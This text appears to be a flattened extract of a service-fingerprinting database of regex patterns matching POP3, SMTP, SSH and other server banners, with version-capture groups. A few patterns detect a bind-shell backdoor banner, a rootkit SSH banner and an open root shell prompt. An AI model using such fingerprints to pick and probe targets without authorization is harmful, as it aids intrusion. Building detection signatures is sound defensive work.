Welcome to the mail server\.\r\n +\+OK CMailServer ([\d.]+) POP3 Service Ready\r\n +\+OK ([-\w_.]+) running EIMS X ([\w.]+) < +\+OK POP3 server \(Neon Mail Server System Advance ([-\w_.]+), [^)]*\) ready ([-\w_.]+)\. < +\+OK Welcome to the Atmail POP3 server - Login with user@domain\.\r\n +\+OK Dovecot DA ready\.\r\n +Unable to open trace file \"/var/spool/popper/ +\+OK POP3D\(\*\) Server PMDFV([\w._-]+) at .* <\w+@([\w._-]+)>\r\n +\+OK Pop3 ready\.\r\n +\+OK ([\w._-]+) Cyrus POP3 v([\w._-]+)-OS X Server ([\w._-]+):\t9L1 server ready <[\d.]+@[\w._-]+>\r\n +\+OK Kerio Connect ([\w._ -]+) POP3 server ready <[\d.]+@([\w._-]+)>\r\n +\+OK Welcome NewsGator Online Services POP3 Server version ([\w._-]+)\r\n +\+OK POP3 AnalogX Proxy (\d[-.\w]+) \(Release\) ready\.\n +Proxy\+ POP3 server\. Insecure access - terminating\.\r\n +\+OK Proxy-POP server \(DeleGate/([\d.]+) by ysato AT delegate DOT org\) at ([-\w_.]+) starting\.\r\n +\+OK POP3 Y(?:ahoo)?POPs! proxy ready\r\n +\+OK POP3 \(Spampal\) server ready \(USER command must include mailserver name\)\r\n +\+OK Mirapoint POP3PROXY ([-\w.]+) server ready\r\n +\+OK AVG POP3 Proxy Server Beta - ([\d/.]+) \[[\d.]+\]\r\n +\+OK AVG POP3 Proxy Server ([\d/.]+) \[[\w/.]+\]\r\n +\+OK AVG POP3 Proxy Server <[\w.]+@[-\w_.]+> ([\d/.]+) \[[\d/.]+\]\r\n +-ERR AVG POP3 Proxy Server: Cannot connect to the mail server!\r\n +\+OK POP3 Spam Inspector Spam Filter Gateway Version ([\d.]+) Ready\.\r\n +\+OK MailMarshal\(([\d.]+)\) POP3 server ready <[\d.]+@([-\w_.]+)>\r\n +\+OK HTML2POP3 server ready \(([\d.]+)\)\r\n +\+OK ([-\w_.]+) POP3 proxy ready\r\n +\+OK AVG POP3 Proxy Server <[\d.]+@([-\w_.]+)> ([\d.]+)/[\d.]+ \[[\d/.]+\]\r\n +\+OK InterScan VirusWall POP3 Proxy\r\n +-ERR 403 The requested host is forbidden by WinProxy\. See your network administrator\.\n +\+OK MrPostman webmail proxy ready\r\n +\+OK F-Secure/fsigk_pop/\d+/[-\w_.]+ starting\.\r\n +\+OK hello from popgate\(([\d.]+)\)\r\n +\+OK \[ISafe POP3 Proxy\] \r\n +\+OK <[\d.]+@([-\w_.]+)> \[ISafe POP3 Proxy\] \r\n +\+OK UserGate: forward ready\r\n-ERR UserGate: Mistake of the protocol\r\n +\+OK kingate pop3 proxy\r\n +\+OK avast! POP3 proxy ready\.\r\n +\+OK O3SIS UMA Proxy POP3 Server ([\w._-]+)\r\n +200 ([-._\w]+) poppassd v?([-._\w]+) +200 poppassd hello, who are you\?\r\n +200 hello there, who are you\?\r\n +200 hello there, please tell me who you are\r\n +200 poppassd v([\w.]+) for Digital Unix with C2 security Hello, who are you\?\r\n +200 ([-.+\w]+) MercuryW PopPass server ready\.\r\n| p|Mercury/32 poppass service +200 X1 NT-PWD Server ([-.+\w]+) \(IMail (\d[-.\w]+)\)\r\n +200 CommuniGate Pro PWD Server (\d[-.\w]+) ready < +550 Login failed - already \d+/\d+ users connected sorry \(use G_CON_PERIP_EXCEPT to bypass\) \(IP=[\d.]+\)\r\n +200 Post\.Office v([\d.]+) password server ready\r\n +\+OK [-\[\]\(\)!,/+:<>@.\w ]+\r\n +lpd \[@([-\w_.]+)\]: connected from invalid port \(\d+\)\n| p|BSD/Linux lpd +lpd: Host name for your address \(\d+\.\d+\.\d+\.\d+\) unknown\n +([-\w_.]+): /usr/lib/lpd: Malformed from address\n +\d+-201 ill-formed FROM address\. +\0\.[\w._/-]+/Library/Preferences/PyCharm([\w._-]+)\0\)[\w._/-]+/Library/Caches/PyCharm[\w._-]+ +QAS2 +\0\0\x01V\xff\xff\xff\xff\xff\xffRT\0\x124V\x08\0E.\x01H...\0.\x11..\0\0\0\0\xff\xff\xff\xff\0D\0C\x014.{1,2}\x01\x01\x06\0......\0{18}RT\0\x124V\0{202}c\x82Sc5\x01 +\r\nHello, this is [Qq]uagga \(version (\d[-.\w]+)\)\.\r\nCopyright 1996-200 +200-?RAP 1 ([-\w_.]+) ([-\w_.]+) radmind access protocol\r\n +\0.\0\x01\0\0\0\0.*\x0b\0\0\0\0([-\w_]+)\x00437 +_realplayfavs_::([\w\s]+)::connected\0 +(\d+\.\d+\.\d+) G\0\0\0\xb6\0.\t +\xe1\xe7\xef\xf0\0\0\x00.\(Righteous Backup Linux Agent\) ([^\xe1]+)\xe1\xe7\xe6\x07\0\x01\0 +\xe1\xe7\xe6\x07\0\x01\0 +roku: ready\r\n +\+host=cashew version=([\d.]+) uptime=[\d+:]+ audio-bits=\d+ audio-byte-order=\w+-endian +\0\0\0.NI_RTERR\0.\0\0\xff\xff\xff\xfb\0\0\0.\*ERR\*\x001\0connection timed out\0-5\0NI \(network interface\)\x007\d0\x003\d\0nirout\.cpp\x00\d\d\d\d\0RTPENDLIST::timeoutPend: CONNECTED timeout\0\w+ +\w+ +\d+ +\d+:\d+:\d+ +\d+\0\0\0\x0046\0SAProuter ([\w._ ()-]+) on '([\w._-]+)'\0\0\0\0\0\*ERR\*\0\0\0\0\0 +\x02\x1c50\x1c\x03\0\0\0\0 +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w._-]+-Debian[- ][\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved \(Murder\) v([-.\w]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v([\w_.]+)-OS X ([^"]+)\"\r\n +\"IMPLEMENTATION\" \"Cyrus timsieved v(\d[-.\w]+)\"\r\n| p/Cyrus timsieved/ v/1/ i|included w/cyrus imap +\"IMPLEMENTATION\" \"dovecot\"\r\n +\"IMPLEMENTATION\" \"DBMail timsieved ([\w._-]+)\"\r\n +/usr/share/pysieved/plugins/dovecot\.py:27: DeprecationWarning: The popen2 module is deprecated\. Use the subprocess module\.\n import popen2\n\"IMPLEMENTATION\" \"pysieved ([\w._+-]+)\"\r\n +\"IMPLEMENTATION\" \"Dovecot Pigeonhole\"\r\n\"SIEVE\" \"[\w._;-]+(?:\s+[\w._;-]+)*\"\r\n\"NOTIFY\" \"mailto\"\r\n\"SASL\" \"[\w._;-]*(?:\s+[\w._;-]+)*\"\r\n\"STARTTLS\"\r\n\"VERSION\" \"([\w._-]+)\"\r\nOK \"Dovecot ready\.?\"\r\n +SGMS Scheduler SGMS (\d+) ([\d.]+) .*\n> +t\x03\0\0 +\x01remshd: Kerberos Authentication not enabled\.\n +\x01remshd: Error! Kerberos authentication failed +(?:ba)?sh-\d\.\d\d\w?# +:: w4ck1ng-shell \(Private Build v([\w._-]+)\) bind shell backdoor :: \n\n +GENERAL: \d+ \d+\n +220 SLNP (\w+)@[vV]ersion:\s?V?([^@]+)@user:([^@]+)@pid:\d+\n +220 ([-\w_.]+) PGP Universal service ready \(proxied server greeted us with: (.*)\)\r\n +220 ([-/.+\w]+) MailGate ready for ESMTP on +220 ([-/.+\w]+) SMTP ready to roll\r\n +220 ([-/.+\w]+) Internet Rex ESMTP daemon at your service\.\r\n +220 ([-.+\w]+) ESMTP NetIQ MailMarshal \d[-.\w]+ Service Pack (\w+) \(v(\d[-.\w]+)\) Ready\r\n +554-([-.+\w]+)\.us\r\n554 Access denied\r\n +220.*?MERCUR SMTP[\s-]Server \(v([^)]+)\) for ([-.\w ]+) ready at +220 ([-.\w\d]+) ESMTP \([a-fA-F0-9]{32}\)\r\n +554 Service unavailable; Client host \[[\w._-]+\] blocked using Barracuda Reputation; +220 ([-.+\w]+) Mercury/32 v(\d[-.\w]+) ESMTP server ready\.\r\n| p|Mercury/32 smtpd +520 Connection not authorised from this address\.\r\n +554 SMTP service not available\r\n +220 ([-\w_.]+) <1\d+\.\d+@[-\w_.]+> \[XMail (\d[-.\w]+) ESMTP Server\] service ready +421 \[XMail ([\d.]+) \(Linux/Ix86\) ESMTP Server\] - Server does not like Your IP\r\n| p/XMail SMTP server/ v/1/ i|Linux/x86 +220 ([-.\w]+) FirstClass ESMTP Mail Server v(\d[-.\w]+) ready\r\n +220 ([-.\w]+) AppleMailServer (\d[-.\w]+) SMTP Server Ready\r\n +220 ([-.\w]+) eXtremail V(\d[-.\w]+) release (\d+) rev(\d+) ESMTP server ready \.\.\.\r\n +220 ([-.\w]+) service desk (\d[-.\w]+) SMTP Service Ready for input\.\r\n +220 ([-.\w]+) VPOP3 SMTP Server Ready\r\n +421 Insufficient System Storage\.\(IMail ([\d.]+)\)\r\n +220 \[?([-.+\w]+)\]? Microsoft ESMTP MAIL Service, Version: ([-\w.]+) ready +220 ([-\w_.]+) Microsoft ESMTP MAIL Service ready at +220 ([\w._-]+) Microsoft ESMTP MAIL Service Version: ([\w._-]+)\r\n +220 ([-.+\w]+) ESMTP Server \(Microsoft Exchange Internet Mail Service ([-\w.]+)\) ready +220 \+OK Microsoft Exchange SMTP server version ([\d.]+) +220[- ].*\r\n220[- ]([^\r\n]+) ESMTP Exim +220 CheckPoint FireWall-1 secure ESMTP server\r\n +220 CheckPoint FireWall-1 secure SMTP server\r\n +220 ([-.+\w]+) running IBM AS/400 SMTP V([\w]+)| p|IBM AS/400 smtpd +220 ([-.+\w]+) ESMTP MailEnable Service, Version: (\d[\w.]+)- ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: \d+--([\d.]+) ready at +220 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) ready at +530 ([-.+\w]+) ESMTP MailEnable Service, Version: ([\w._-]+) denied access at +220 ([-.+\w]+) SMTP/smap Ready\.\r\n +220 ([-.+\w]+) ESMTP service \(Netscape Messaging Server ([-.+ \w]+) \(built +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) NTMail \(v([-.+\w]+)/.* ready +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) ESMTP Postfix\r\n +220-InterScan Version (\S+) .*Ready\r\n220 ([-.+\w]+) Microsoft ESMTP MAIL Service, Version: ([\d.]+) ready at +220 Trend Micro ESMTP ([-.+\w]+) ready\.\r\n +220(\S+) WebShielde(\w+)/SMTP Ready. +220 ([-.+\w]+) ESMTP MailMasher ready to boogie\r\n +220 ([-.\w]+) ESMTP Postfix \(([-.\w]+)\) \(([-.\w ]+)\) +220 [\*\d\ ]{2,300}\r\n +220 ArGoSoft Mail Server Pro for WinNT/2000/XP, Version ([-.\w]+) \(([-.\w]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w.]+) ArGoSoft Mail Server, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-\w_.]+) ArGoSoft Mail Server Freeware, Version [\d.]+ \(([\d.]+)\)\r\n +220 ([-.\w]+) ESMTP Service. Welcome.\r\n +220 ([-.\w]+) Mercury (\d[-.\w]+) ESMTP server ready\.\r\n +220 ESMTP Service \(Lotus Domino Release ([\w._-]+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Release (\d[-.\w ]+)\) ready +220 ([-.\w]+) ESMTP Service \(Lotus Domino (\d[-.\w ]+)\) ready at +220 ESMTP Service \(Lotus Domino Build V([\w_]+) Beta (\w+)\) ready at +220 ([-.\w]+) ESMTP Service \(Lotus Domino Versione ([\w._ -]+)\) ready +220 ([-.\w]+) Lotus SMTP MTA Service Ready\r\n +220 ([-.\w]+) WebSTAR Mail Simple Mail Transfer Service Ready\r\n +220 ([-.\w]+) SMTP NAVGW (\d[-.\w]+); +220 ([-.\w]+) Kerio MailServer (\d[-.\w]+ patch \d+) ESMTP ready\r\n +220 YSmtp(\S+) ESMTP service ready +220 (\S+) ESMTP WEB.DE V([^\s\;]+) +220 Compuserve Office Mail Service \(lnxc-(\d+)\) ESMTP +220 Welcome to Nemesis ESMTP server on \S+ +220 (\S+).*?SMTP \(Sun Internet Mail Server sims.(\d[^\)]+)\) +220 (\S+) ESMTP XWall v(\d\S+) +220 (\S+) eMail Sentinel (\d+) ESMTP Service ready +220 ([-\w_.]+) Service ready by DvISE PostMan \((\d+)\) ESMTP Server \(Tobit Software, Germany\)\r\n +220 ([-\w_.]+) -- Server ESMTP \(Sun Java\(tm\) System Messaging Server ([\w._-]+) (\d+)bit \(built .*\)\)\r\n +220 (\S+) -- Server ESMTP \(Sun Java System Messaging Server (\d[^\(\)]+) +220[- ][^ ]+ Smail-([^ ]+) +220-([-\w_.]+) Stalker Internet Mail Server V\.([\w.]+) is ready\.\r\n +220 ([-\w_.]+) ESMTP MailMax ([\d.]+) [A-Z][a-z][a-z].*\r\n +220 ([-\w_.]+) Mailmax version ([\d. ]+) ESMTP Mail Server Ready \r\n +220 ([-\w_.]+) running IBM MVS SMTP CS V2R10 on .*\r\n +220 [-\w_]+ ESMTP ([-\w_.]+) \(Debian/GNU\)\r\n +220 ESMTP \(Debian/GNU Mewwwwwww\)\r\n +220 ([\w._-]+) [\w._-]+ ESMTP Postfix \(Debian/GNU\) +220 ([-\w_.]+) ESMTP postfix NO UCE\r\n +220 ([-\w_.]+) SMTPD Server - Postfix\r\n +220 ([-\w_.]+) ESMTP Oracle Email Server SMTP Inbound Server\t([\d.]+) \t Ready\r\n +220 ([-\w_.]+) Mail essentials server \(([\d.]+)\) ready for ESMTP transfer\r\n +220 ([-\w_.]+) ESMTP - WinRoute Pro ([\d.]+)\r\n +220 ([-\w_.]+) ESMTP Lyris ListManager service ready\r\n +220 ESMTP Lyris service ready\r\n +220 ESMTP Lyris ListManager service ready\r\n +220 ([-\w_.]+) SMTP Ready 12\.\r\n +220 ([-\w_.]+) ESMTP server \(Netscape Messaging Server - Version ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) ZMailer Server ([\w.]+) #\d+ ESMTP ready at .*\r\n +220 Coremail SMTP\(Anti Spam\) System \(\w+\[(\d+)\]\)\r\n +220 ([-\w_.]+) \(PowerMTA(?:\(TM\)) v([\w.]+)\) ESMTP service ready\r\n +220 ([-\w_.]+) ESMTP BorderWare MXtreme Mail Firewall\r\n +220 ([-\w_.]+) SMTP Server \(JAMES SMTP Server\) ready +220 ([-\w_.]+)\s+ESMTP MDaemon ([\d.]+); .*\r\n +220[ -]([-\w_.]+) ESMTP MSA MDaemon ([\d.]+); +421 Sorry, SMTP server too busy right now \(193\); try again later\r\n +220 ([-\w_.]+) ESMTP HT Mail Server v([\d.]+); .*\r\n +220 ([-\w_.]+) ESMTP IceWarp ([\d.]+)[; ] +220 ([-\w_.]+) ESMTP Gruponet IE2020 ([\d./]+);\r\n +220 ([-\w_.]+) mailfront ESMTP\r\n +220 ([-\w_.]+) SMTP Server SLmail ([\d.]+) Ready ESMTP spoken here\r\n +220 ([-\w_.]+) VaMailArmor-([\d.]+)\r\n +220 ([-\w_.]+) ESMTP MailFrontier \(([\d.]+)\)\r\n +220 ([-\w_.]+) WindowsNT SMTP Server v([\w/.]+) ESMTP ready at .*\r\n +220 ([-\w_.]+) \(LSMTP for Windows NT v([\w.]+)\) ESMTP server ready\r\n +220 ([-\w_.]+) SMTP Mandamail ([\d.]+)/[\d.]+\r\n +500 Permission denied - closing connection\.\r\n +220 \(SMTP\) hMailServer ([\d.]+) - Up since .*\r\n +220 ([-\w_.]+) Ready for action \(Mailtraq ([\d.]+)/E?SMTP\)\r\n +220 ([-\w_.]+) SMTP Service Ready \(QuickMail Pro Server for MacOS ([\d.]+)\)\r\n +220 LiteMail SMTP Server Ready\.\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow SMTP Server ([\d.]+)\) ready .*\r\n +220 ([-\w_.]+) SMTP Server \(DeskNow\) ready +220 network-box ESMTP\r\n +220 ESMTP on WebEasyMail \[([\d.]+)\] ready\. http://www\.51webmail\.com\r\n +220 ([-\w_.]+) AntiVir MailGate\r\n +220 server ESMTP KEN! v([\d.]+); .*\r\n +220 ([-\w_.]+) NTMail \(v([\d.]+)/[\w.]+\) ready for ESMTP transfer \r\n +220-([-\w_.]+) Sendmail IBM OS/2 SENDMAIL VERSION ([\w./]+) ready at .*\r\n220 ESMTP spoken here\r\n| p/Sendmail smtpd/ v/2/ o|OS/2 +220 shttp\.srv Simple Mail Transfer Service Ready\r\n +501 Domain must resolve\r\n +220 ([-\w_.]+) ModusMail ESMTP Receiver Version ([\d.]+) Ready\r\n +220 mailmatrix SMTP Server \(Mail Matrix Server\) ready +220-([-\w_.]+) ESMTP .* GoMail V([\d.]+); +220 [-\w_.]+ Winmail Mail Server ESMTP ready\r\n +220 ([-\w_.]+); .* \+\d+\r\n +421 unable to read controls \(#4\.3\.0\)\r\n +554 Please check that your outgoing mail server settings are correct\. Contact your service provider's technical support for assistance\.\n +rblsmtpd: [\d.]+ pid \d+:.*220 rblsmtpd\.local\r\n +220 SurgeSMTP \(Version ([-\w_.]+)\) http://surgemail\.com\r\n +220 ([-\w_.]+) Welcome to RaidenMAILD E?SMTP service v([\d.]+), +220 ESMTP on WinWebMail \[([\d.]+)\] ready\. http://www\.winwebmail +220-W E L C O M E T O Q U A R K M A I L S M T P S E R V I C E !\r\n220 ([-\w_.]+) ESMTP server \(quarkmail server - version ([\d.]+)\) ready +220 .*\r\n221 2\.7\.0 Error: I can break rules, too\. Goodbye\.\r\n +220 ([-\w_.]+) running EIMS X ([\w.]+)\r\n +220 DP-3510\r\n +220 ([-\w_.]+) Axigen ESMTP ready\r\n +421 Unexpected log failure, please try later\r\n +220 ([-\w_.]+) DynFX ESMTP Server ([-\w_.]+) \( +220 ;; ESMTP connection timed out; no servers could be reached Sendmail ([-\w_.]+)/ +554 ([-\w_.]+) ESMTP not accepting messages\r\n +220 ([-\w_.]+) L-Soft HDMail SMTP Service Version: ([-\w_.()]+) ready +220 ([-\w_.]+) Synchronet SMTP Server ([\d.]+)-Win32 Ready\r\n +220 ShareMailPro SMTP Server Ready \r\n +220 ([-\w_.]+) ESMTP Service\(Mail2000 ESMTP Server V([-\w_.]+)\) ready +220 ([-\w_.]+) 4D WebSTAR V Mail \(([-\w_.]+)\) Ready for action\r\n +220 Service ready KM([\w._-]+) smtpd\r\n +220 ([\w_.-]+) cqgreylist - minimal smptd\r\n +220 ([\w_.-]+) ESMTP AnNyungSMTP ([\w._-]+); +220 DP-1820E\r\n +220 ([\w_.-]+) VHCS2 [\w._-]+ (\w+) Managed ESMTP ([\w._-]+)\r\n +220.*SMTP Welcome to the IA eMailServer Standard Edition Version: ([\d.]+ Build: [\d]+) +220 ([\w_.-]+) bizsmtp ESMTP server ready\r\n +220 ([\w_.-]+) ESMTP NetBox\(tm\)\r\n +220 ([\w_.-]+) StrongMail SMTP Service Version: (\S+) ready +421 Service not available, closing transmission channel\r\n +421 Service not available, closing transmission channel \r\n +220 ([\w_.-]+) ESMTP OpenSMTPD\r\n +220 ([\w_.-]+) ESMTP Citadel server ready\.\r\n +220 BEJY V([\w._-]+) SMTP ([\w._-]+) \(c\) \d+-\d+ by BebboSoft, Stefan \"Bebbo\" Franke, all rights reserved ready\r\n +220 Welcome NGOS SMTP Server version ([\w._-]+)\r\n +220 ([\w._-]+) Kerio Connect ([\w._ -]+) ESMTP ready\r\n +220 ([\w._-]+) running IBM VM SMTP Level (\d+) on +421 4\.3\.2 Service not available\r\n +220 ([\w._-]+) Service ready by David\.fx \(([\w._-]+)\) ESMTP Server \(Tobit\.Software, Germany\)\r\n +220 HOST: ([\w._-]+) Supportworks ESMTP Server ([\w._-]+) ready\r\n +220 ([-\w_.]+) SMTP/DeleGate/([\d.]+) ready at .*\r\n +220 ([-/.+\w]+) SMTP AnalogX Proxy (\d[-.\w]+) \(Release\) ready\r\n +220 ([-\w_.]+) ESMTP spamd IP-based SPAM blocker; .*\r\n +220 ESMTP smtprelay service ready\.\r\n +220 ([-\w_.]+) SMTP hotsmtpd v([\d.]+)\. ESMTP-HTTPMail Gateway based on hotwayd\.\r\n +220 ([-\w_.]+) Welcome SpamFilter for ISP SMTP Server v([\d.]+) - Unlicensed Evaluation Copy\r\n +421 proxyplus\.universe SMTP server\. Insecure access - terminating\.\r\n +220 AVG ESMTP Proxy Server Beta - ([\d./]+) \[[\d.]+\]\r\n +220 AVG ESMTP Proxy Server ([\d./]+) \[[\d./]+\]\r\n +554 ([\d.]+) ([-\w_.]+) No mail service\r\n +220 Traffic Inspector SMTP Gate \(SPAM protected\), ver\. ([\w._-]+), ready at.*\r\n +220 mailwall SMTP Server \(Ikarus MailWall by David Grabenweger\) ready\r\n +220 ([-\w_.]+) ESMTP - eXpurgate ([\d.]+) \( +220 CCProxy ([\d.]+) SMTP Service Ready\(Unregistered\)\r\n +NoSpamToday! SMTP Proxy Monitoring Service Ready\.\r\n +220 ([-\w_.]+) ESMTP bitdefender +220 ([-\w_.]+) ESMTP BitDefender Proxy version ([^\r\n]+)\r\n +220 [-\w_.]+ avast! SMTP proxy ready\.\r\n +220 ([-\w_.]+) (SCM\d+)/SMTP Ready\.\r\n +554 You are not allowed to connect\.\r\n +220 ([\w._-]+) ESMTP Symantec Brightmail Gateway\r\n +220 ([\w._-]+) ESMTP server ready \(Alligate v([\w._-]+)\)(?: AUTH ONLY)?\r\n +220 ([\w._-]+)\.ARK Sendmail ready\. \r\n +421 too many connections\r\n +220 ([-\w_.]+) ESMTP Service ready\r\n +220 ([\w._-]+) AVKSMTP Server\r\n +220 (\S+) Welcome to SpamFilter for ISP SMTP Server v(\d\S+) +220[\s-].*?E?SMTP[^\r]*\r\n +550 (\d.\d.\d) ([^\r\n]+) +Statistics from .*\n M msgsfr bytes_from msgsto bytes_to msgsrej msgsdis Mailer\n +220 ([-.\w]+) SNPP server \(HylaFAX \(tm\) Version ([-.\w]+)\) ready.\r\n +220 QuickPage v(\d[-.\w]+) SNPP server ready at +250\r\nProtocol-Version:(\d[\d.]+)\r\nMessage-ID:\d+\r\nDatabase .*\r\nContent-Length:\d+\r\nKey Length:(\d+)\r\n\r\n.*(\w:\\.*ini)\r\n\r\n +SPMD_ACK\0\0\x01\0\x01 +SSH-([\d.]+)-([\d.]+) F-Secure SSH Windows NT Server\r?\n +SSH-([\d.]+)-([\d.]+) dss F-SECURE SSH\r?\n +SSH-([\d.]+)-([\d.]+) F-SECURE SSH.*\r?\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+) - Process Software MultiNet\r\n +SSH-([\d.]+)-ReflectionForSecureIT_([-\w_.]+)\r?\n +SSH-(\d[\d.]+)-SSH Protocol Compatible Server SCS (\d[-.\w]+)\r?\n +SSH-([\d.]+)-SSH Compatible Server\r?\n +SSH-([\d.]+)-([\d.]+) SSH Secure Shell Tru64 UNIX\r?\n +SSH-([\d.]+)-(\d+\.\d+\.\d+) SSH Secure Shell +sshd: SSH Secure Shell (\d[-.\w]+) on ([-.\w]+)\nSSH-(\d[\d.]+)- +sshd2\[\d+\]: .*\r\nSSH-([\d.]+)-(\d[-.\w]+) SSH Secure Shell \(([^\r\n\)]+)\)\r?\n +SSH-([\d.]+)-(\d+\.\d+\.[-.\w]+) +SSH-([\d.]+)-OpenSSH_([\w._-]+) Debian-(\S*maemo\S*)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)[ -]{1,2}Debian[ -_]([^\r\n]+)\r?\n +SSH-([\d.]+)-OpenSSH_[\w.]+-FC-([\w.-]+)\.fc(\d+)\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD localisations (\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-(?:[\w.,]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-overwrite-base +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n +SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n +SSH-([\d.]+)-Nortel\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n +\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v +SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n +SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 +SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 +SSH-([\d.]+)-Sun_SSH_(\S+) +SSH-([\d.]+)-meow roototkt by rebel +SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n +SSH-(\d[\d.]*)-(Server-V)\r?\n +SSH-(\d[\d.]*)-(Server-VI)\r?\n +SSH-(\d[\d.]*)-(Server-VII)\r?\n +SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n +\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n +SSH-2\.0-0\.0 \r?\n +SSH-([\d.]+)-([\w.]+) VShell\r?\n +SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n +SSH-1\.5-X\r?\n +Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n +SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-cryptlib\r?\n +SSH-2\.0-1\.0 Radware SSH \r?\n +SSH-2\.0-(\d{8,12})\r?\n +SSH-2\.0-Twisted\r?\n +SSH-2\.0-PGP\r?\n +SSH-([\d.]+)-libssh-([-\w.]+)\r?\n +SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n +SSH-([\d.]+)-VRP-([\d.]+)\r?\n +SSH-([\d.]+)-lancom\r?\n +SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd +SSH-([\d.]+)-AOS_SSH\r?\n +SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n +SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n +SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n +SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n +SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd +SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n +SSH-([\d.]+)-([\w.]+)rad\r?\n +SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n +SSH-1\.5-SSH\.0\.1\r?\n +SSH-([\d.]+)-Ingrian_SSH\r?\n +SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n +SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n +SSH-([\d.]+)-Zyxel SSH server\r?\n +SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n +SSH-2\.0-SSH_0\.2\r?\n +SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n +SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n +Could not load host key\. Closing connection\.\.\. +SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n +SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n 